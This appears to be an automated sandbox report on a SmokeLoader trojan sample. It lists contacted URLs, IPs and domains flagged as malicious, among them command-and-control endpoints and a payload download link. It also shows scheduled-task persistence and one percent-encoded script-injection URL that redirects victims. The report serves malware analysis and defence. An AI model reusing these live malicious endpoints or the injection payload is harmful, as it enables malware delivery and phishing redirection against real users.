                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
                  https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.00%VirustotalBrowse
                  https://calvinandhalls.com/0%VirustotalBrowse
                  https://23.145.40.164/ksa9104.exe0%VirustotalBrowse
                  https://aka.ms/odirmr0%VirustotalBrowse
                  https://calvinandhalls.com/search.phpMozilla/5.00%VirustotalBrowse
                  http://unicea.ws/tmp/index.php0%VirustotalBrowse
                  https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%VirustotalBrowse
                  https://calvinandhalls.com/search.php0%VirustotalBrowse
                  http://nwgrus.ru/tmp/index.php16%VirustotalBrowse
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%VirustotalBrowse
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%VirustotalBrowse
                  https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg0%VirustotalBrowse
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%VirustotalBrowse
                  https://api.msn.com/q0%VirustotalBrowse
                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%VirustotalBrowse
                  https://calvinandhalls.com/earch.php0%VirustotalBrowse
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%VirustotalBrowse
                  https://wns.windows.com/L0%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  calvinandhalls.com
                  23.145.40.162
                  truetrueunknown
                  bg.microsoft.map.fastly.net
                  199.232.210.172
                  truefalseunknown
                  nwgrus.ru
                  190.219.117.240
                  truetrueunknown
                  globalviewsnature.com
                  23.145.40.113
                  truetrue
                    unknown
                    fp2e7a.wpc.phicdn.net
                    192.229.221.95
                    truefalseunknown
                    NameMaliciousAntivirus DetectionReputation
                    https://23.145.40.164/ksa9104.exetrueunknown
                    http://unicea.ws/tmp/index.phptrueunknown
                    http://nwgrus.ru/tmp/index.phptrueunknown
                    https://calvinandhalls.com/search.phptrueunknown
                    http://tech-servers.in.net/tmp/index.phptrue
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://calvinandhalls.com/explorer.exe, 0000000B.00000002.2707106638.0000000000980000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2707106638.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2707106638.0000000000A0B000.00000004.00000020.00020000.00000000.sdmptrueunknown
                      https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1762089358.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                      https://duckduckgo.com/chrome_newtabexplorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 0000000B.00000002.2707106638.00000000009E6000.00000004.00000020.00020000.00000000.sdmptrueunknown
                      https://duckduckgo.com/ac/?q=explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.drfalse
                      • URL Reputation: safe
                      unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://calvinandhalls.com/search.phpMozilla/5.0explorer.exe, 0000000B.00000002.2707106638.0000000000980000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2667025183.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4176755346.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4176575408.0000000001318000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4176400478.0000000000827000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.4176402726.00000000013C8000.00000004.00000020.00020000.00000000.sdmptrueunknown
                      https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1762089358.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                        unknown
                        https://powerpoint.office.comcemberexplorer.exe, 00000001.00000000.1765842009.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1763817484.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          unknown
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://excel.office.comexplorer.exe, 00000001.00000000.1765842009.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17451E.exe, 00000009.00000002.4177703163.000002E002E77000.00000004.00000020.00020000.00000000.sdmp, 451E.exe, 00000009.00000003.4155384339.000002E004C26000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.microexplorer.exe, 00000001.00000000.1764575122.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1763344774.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1762910279.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                            unknown
                            https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                            https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000001.00000000.1762089358.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install451E.exe, 00000009.00000003.4155384339.000002E004C02000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://calvinandhalls.com/5explorer.exe, 0000000B.00000002.2707106638.0000000000980000.00000004.00000020.00020000.00000000.sdmptrue
                              unknown
                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchexplorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.drfalse
                              • URL Reputation: safe
                              unknown
                              https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                unknown
                                https://api.msn.com/qexplorer.exe, 00000001.00000000.1763817484.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                  unknown
                                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000001.00000000.1765842009.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                    unknown
                                    https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                    https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1762089358.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                      unknown
                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                      https://calvinandhalls.com/earch.phpexplorer.exe, 0000000B.00000002.2707106638.00000000009E2000.00000004.00000020.00020000.00000000.sdmptrueunknown
                                      https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1765842009.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                      https://word.office.comexplorer.exe, 00000001.00000000.1765842009.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17pot451E.exe, 00000009.00000002.4177606675.000002E002E44000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoexplorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.drfalseunknown
                                        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1762089358.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                        https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          unknown
                                          https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                            unknown
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016451E.exe, 00000009.00000002.4176613175.000002E002E1E000.00000004.00000020.00020000.00000000.sdmp, 451E.exe, 00000009.00000003.4155384339.000002E004C26000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://www.ecosia.org/newtab/explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                              unknown
                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br451E.exe, 00000009.00000002.4176613175.000002E002DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://aka.ms/Vh5j3kexplorer.exe, 00000001.00000000.1762089358.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                unknown
                                                https://ac.ecosia.org/autocomplete?q=explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000001.00000000.1763817484.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://support.moz451E.exe, 00000009.00000003.4168022466.000002E004F29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://calvinandhalls.com/pexplorer.exe, 0000000B.00000002.2707106638.0000000000980000.00000004.00000020.00020000.00000000.sdmptrue
                                                            unknown
                                                            https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://android.notify.windows.com/iOSexplorer.exe, 00000001.00000000.1765842009.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000001.00000000.1762089358.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://api.msn.com/explorer.exe, 00000001.00000000.1763817484.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://support.mozilla.org451E.exe, 00000009.00000003.4168022466.000002E004F22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://outlook.com_explorer.exe, 00000001.00000000.1765842009.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples451E.exe, 00000009.00000003.4155384339.000002E004C02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://www.msn.com:443/en-us/feedexplorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              201.212.52.197
                                                                              unknownArgentina
                                                                              10481TelecomArgentinaSAARtrue
                                                                              190.219.117.240
                                                                              nwgrus.ruPanama
                                                                              18809CableOndaPAtrue
                                                                              23.145.40.164
                                                                              unknownReserved
                                                                              22631SURFAIRWIRELESS-IN-01UStrue
                                                                              23.145.40.162
                                                                              calvinandhalls.comReserved
                                                                              22631SURFAIRWIRELESS-IN-01UStrue
                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1524644
                                                                              Start date and time:2024-10-03 02:51:04 +02:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 12m 29s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:43
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:1
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:v173TV3V11.exe
                                                                              renamed because original name is a hash value
                                                                              Original Sample Name:c108169f00ff9c5ad6fa70df9137e44a.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@81/14@6/4
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HCA Information:
                                                                              • Successful, ratio: 96%
                                                                              • Number of executed functions: 162
                                                                              • Number of non-executed functions: 86
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                              • Excluded IPs from analysis (whitelisted): 20.12.23.50
                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ocsp.edge.digicert.com, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                              • Report size getting too big, too many NtOpenKey calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              TimeTypeDescription
                                                                              01:52:23Task SchedulerRun new task: Firefox Default Browser Agent 31EA40A44D442C4F path: C:\Users\user\AppData\Roaming\bsjhhuh
                                                                              01:53:17Task SchedulerRun new task: Firefox Default Browser Agent EBB3874FD7AB522A path: C:\Users\user\AppData\Roaming\vejhhuh
                                                                              20:52:22API Interceptor351348x Sleep call for process: explorer.exe modified
                                                                              20:53:34API Interceptor14x Sleep call for process: WMIC.exe modified
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              201.212.52.197yEIhhlohep.exeGet hashmaliciousLummaC, Go Injector, SmokeLoaderBrowse
                                                                              • 100xmargin.com/tmp/index.php
                                                                              23.145.40.1640k3ibTiMjy.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                qg5Ddf4an9.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                  aZPm0tHPTX.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                    file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      OCYe9qcxiM.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                        file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                          file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                            KTh1gQlT9a.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                              file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                YPDi0gRMHU.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                  23.145.40.1620k3ibTiMjy.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                    qg5Ddf4an9.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      aZPm0tHPTX.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                        file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                          OCYe9qcxiM.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                            file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                              file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                KTh1gQlT9a.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    YPDi0gRMHU.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      nwgrus.ru0k3ibTiMjy.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                      • 189.61.54.32
                                                                                                                      qg5Ddf4an9.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                      • 181.52.122.51
                                                                                                                      aZPm0tHPTX.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                      • 187.131.253.169
                                                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                      • 196.189.156.245
                                                                                                                      k8JAXb3Lhs.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                      • 78.89.199.216
                                                                                                                      OCYe9qcxiM.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                      • 187.228.112.175
                                                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                      • 190.249.193.233
                                                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                      • 210.182.29.70
                                                                                                                      KTh1gQlT9a.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                      • 116.58.10.60
                                                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                      • 190.13.174.94
                                                                                                                      bg.microsoft.map.fastly.netcleu.cmDGet hashmaliciousUnknownBrowse
                                                                                                                      • 199.232.210.172
                                                                                                                      https://73214625721684432150.duckdns.org/home.phpGet hashmaliciousUnknownBrowse
                                                                                                                      • 199.232.214.172
                                                                                                                      http://fpnc.vnvrff.com/Get hashmaliciousUnknownBrowse
                                                                                                                      • 199.232.214.172
                                                                                                                      https://www.florenceco.org/offices/elected/solicitor/docket.php?area=florence%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%27%2C%27%73%3A%2F%2F%76%27%2C%27%61%75%6C%27%2C%27%74%64%6F%27%2C%27%72%65%73%2E%63%27%2C%27%6F%6D%2F%30%2F%27%2C%27%30%2F%30%2F%27%2C%27%34%33%66%66%27%2C%27%35%63%62%35%27%2C%27%63%36%27%2C%27%32%65%27%2C%27%32%66%38%64%31%27%2C%27%31%63%61%33%38%38%27%2C%27%65%34%37%35%62%36%27%2C%27%63%34%36%2F14/392-16513/1254-3178-27524%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3EGet hashmaliciousPhisherBrowse
                                                                                                                      • 199.232.214.172
                                                                                                                      https://porn-app.com/download2Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 199.232.214.172
                                                                                                                      qg5Ddf4an9.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                      • 199.232.210.172
                                                                                                                      LnK0dS8jcA.exeGet hashmaliciousXmrigBrowse
                                                                                                                      • 199.232.210.172
                                                                                                                      Lys2hJAvd1.exeGet hashmaliciousRedLineBrowse
                                                                                                                      • 199.232.210.172
                                                                                                                      gLKtR4HuEw.exeGet hashmaliciousRedLineBrowse
                                                                                                                      • 199.232.214.172
                                                                                                                      https://www.kisa.link/dANpzGet hashmaliciousPhisherBrowse
                                                                                                                      • 199.232.210.172
                                                                                                                      calvinandhalls.com0k3ibTiMjy.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                      • 23.145.40.162
                                                                                                                      qg5Ddf4an9.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                      • 23.145.40.162
                                                                                                                      aZPm0tHPTX.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                      • 23.145.40.162
                                                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                      • 23.145.40.162
                                                                                                                      OCYe9qcxiM.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                      • 23.145.40.162
                                                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                      • 23.145.40.162
                                                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                      • 23.145.40.162
                                                                                                                      KTh1gQlT9a.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                      • 23.145.40.162
                                                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                      • 23.145.40.162
                                                                                                                      YPDi0gRMHU.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                      • 23.145.40.162
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      TelecomArgentinaSAARyakov.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 190.193.239.205
                                                                                                                      novo.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                      • 152.171.235.125
                                                                                                                      novo.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                      • 181.167.249.26
                                                                                                                      novo.ppc440fp.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                      • 181.228.0.241
                                                                                                                      novo.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                      • 181.29.210.0
                                                                                                                      novo.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                      • 181.9.101.236
